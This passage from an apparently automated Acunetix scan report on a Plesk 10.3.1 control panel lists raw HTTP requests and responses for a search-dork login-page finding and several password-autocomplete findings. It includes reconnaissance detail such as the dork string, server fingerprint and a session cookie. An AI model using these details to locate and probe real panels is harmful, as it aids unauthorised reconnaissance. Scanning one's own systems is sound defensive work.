Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2FDefault.aspx
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
/login.php3 (850d2adcba8c50caed0abb2b8e5a6989)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.jsp&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.jsp
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Findex.jsp
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
Acunetix Website Audit61
/login.php3 (a2585f3faf5a218b6c72e48bfa887b23)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/images&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/images
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:15 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Fimages
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:15 GMT
Server: sw-cp-server
/login.php3 (ac2723753fac2b88686cb5b2bc6bbc22)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/default.jsp&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/default.jsp
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Connection: close
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Fdefault.jsp
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
Acunetix Website Audit62
/login.php3 (e15e2853c2c5206206ec59c0de1f5071)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.html&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.html
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Findex.html
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
/login.php3 (e2244fb34780a6680aeb8eb9ff84b62e)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.php&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/index.php
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Findex.php
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
Acunetix Website Audit63
/login.php3 (f185af52a903ff0b9fb5e2940dc0458e)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/sso/ui&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/sso/ui
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsso%2Fui
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Server: sw-cp-server
Password type input with autocomplete enabled
 
SeverityInformational
TypeInformational
Reported by moduleCrawler
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
Impact
Possible sensitive information disclosure
Recommendation
The password autocomplete should be disabled in sensitive applications.
To disable autocomplete, you may use a code similar to:
<INPUT TYPE="password" AUTOCOMPLETE="off">
Affected items
/plesk-billing/admin/index.php/default (17dea874a4260c107340766eaffda035)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Acunetix Website Audit64
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 819
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...aP7MEv3%2bQFi8aA%2b5EP%2fP%2fJsubCjLYW8sKD9E%2ffuUS%2fPynxBXCizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=a2e382443rlratzlfj4buc
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:23 GMT
Server: sw-cp-server
Content-Length: 6564
/plesk-billing/admin/index.php/default (2e39a46f1a52b41b5047fa3cd1302a90)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...tGJzC5%2bVtvOdRpIBD4k1MBy4gz%2bExXxtIgffMfuv%2fi%2bDcE%2fmOUR7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=c9dps92q7ckk9m0d3ylk7219odllhffp7io&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:26 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:26 GMT
Server: sw-cp-server
Content-Length: 6560
Acunetix Website Audit65
/plesk-billing/admin/index.php/default (513bab607d321b2e9132da27afe01b61)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 809
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...UmHVhEYV1lxciqhDz1ESC0qLCp2qifUl%2fIO7H%2f0OU6iSSiQ9TDPcF%2fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=mr11nzj4fvmp0lpbypseqdzlldllhflhvlc&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:34 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:35 GMT
Server: sw-cp-server
Content-Length: 6564
/plesk-billing/admin/index.php/default (5229546eabfab88f36ff003f01533b7e)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 823
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...uUzJ6lXrUjFjnJ7HKLFJDAOVDQnXoQJyU%2f1gTkGDU7xROeBtCmIFl2e%2f9A2DfPdipqsr%2fpgXguJg1n0UYLlnUq8AqTX51kTuvMW01JWeEsR4XO%2bT7otzTtPP6HRHRL27FpPigbdhcpojRgMXR%2fwV9blmeKqXRJVh1ZGTUTTTjs71d3eLnsNza%2b%2b3RdqK0ZowP0bh2qoU0ZuhlaF0g2%2bw0QMR2W5nygCNe6mWo1XT65cIYG0FtPOhyLu8r9FA8fbcSpYxI1KWtSLPdWKKZwY3KQnpYKQPEZPjPLcRy9vZ6bfL%2ffQevjHhyCCKoD%2fwWaPoijJZ8tV5LSHJefwD4p0Go-f16f9880aa4f12de53cf27fea34cfa0a66ab72ab&request_id=rus53u3ath3l8uomn90u5p2yfdllhffmoni&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:26 GMT
Cache-Control: max-age=2592000
Acunetix Website Audit66
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:26 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default (63c59334446a836aca8f6ed80baee5d1)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 819
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...aP7MEv3%2bQFi8aA%2b5EP%2fP%2fJsubCjLYW8sKD9E%2ffuUS%2fPynxBXCizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=sv0q3uhszc35j7nquwacpsc1mdllhfjxlzl&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:32 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:32 GMT
Server: sw-cp-server
Content-Length: 6564
/plesk-billing/admin/index.php/default (6a12a9239841d158904ee3b59f5492bb)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 773
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...BM8CNXXocvMU4o4VEL3aWm%2bYyDmRG6yKqD3b8jPYLHYVpnj75Du1%2f8T31zj6q5YX0HfMipCFhpJseM09beHXcyRaJWCyFts1hDgnAGD5o8rSs0iK%2bvP1E%2bGBeaDmjmEi7PbIiYIgDeQhzDaEdIY9McQ8RVt8H2L2TY3fliXg8vnfsTx296vK1m866PJury63qBqWm8YgVNsm%2bCGL2YdxOUzVhX2u7Ti3Oh%2fPiTr6ThfYNVaZ626BNebX9JrSAZAi%2bSMu4qF1lCNMtJ9QcryR2sJyV%2bL2XIIeP2223%2f%2b9QLSp5Feykw6862JDgKhUNYsuRBo7abn8Agt4SiA%3d%3d-d449d26ccca058f8be3927999fb59010ee52315d&request_id=mxruwqfy9cair3mq4dg5bc
Acunetix Website Audit67
 
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:20 GMT
Server: sw-cp-server
Content-Length: 6413
/plesk-billing/admin/index.php/default (75c36bc2fd49ea42445effd46f006b1d)
Details
Password type input named user_password from form named login with action /plesk-billing/admin/index.php/default?ctr=login has autocomplete enabled.
Request
GET /plesk-billing/admin/index.php/default?act=893&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:20 GMT
Server: sw-cp-server
Content-Length: 5663
/plesk-billing/admin/index.php/default (7ebe774369a91911d541fb1db7083b26)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 823
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...kAi9CGjxmQlzug%2fyU2aFNUH19D%2fH5fEi4g6fBuDf9D2qswXIsuFU9yJMD2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=xegaz4qhrmgkat9654pnylmtjdllhfhwcbo&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:30 GMT
Acunetix Website Audit68
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:30 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default (7f18521e4fd54c25e5c160de78e3bf58)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 819
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...aP7MEv3%2bQFi8aA%2b5EP%2fP%2fJsubCjLYW8sKD9E%2ffuUS%2fPynxBXCizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=tnwmthto6bbbbdmsqv672stspdllhfmupb6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:35 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:35 GMT
Server: sw-cp-server
Content-Length: 6564
/plesk-billing/admin/index.php/default (805c4e4036e72043f679e032841c410f)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 808
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...IUmHVhEYV1lxciqhDz1ESC0qLCp2qifUl%2fIO7H%2f0OU6iSSiQ9TDPcF%2fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=eo8l93kulathzgb1cv79u
Acunetix Website Audit69
 
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:30 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:30 GMT
Server: sw-cp-server
Content-Length: 6563
/plesk-billing/admin/index.php/default (89e67f4d28e68c617bcf1b654aac0e3e)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 811
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ZnMpMOTOLmyHTbtJCIuV8mhqjojAr97mi4sKAH5D74f8gpTpD0P7b6N2DXi5ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=vqde3mrhcmcu72zf2edh2jk25dllhfhnnso&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:29 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Wed, 28 Sep 2011 14:43:29 GMT
Server: sw-cp-server
Content-Length: 6568
/plesk-billing/admin/index.php/default (b4357d8348b6667918fe76f73bed5ec5)
Details
Password type input named user_password from form named login with action https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/relay has autocomplete enabled.
Request
POST /plesk-billing/admin/index.php/default?act=1065&ctr=login HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Content-Length: 875
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
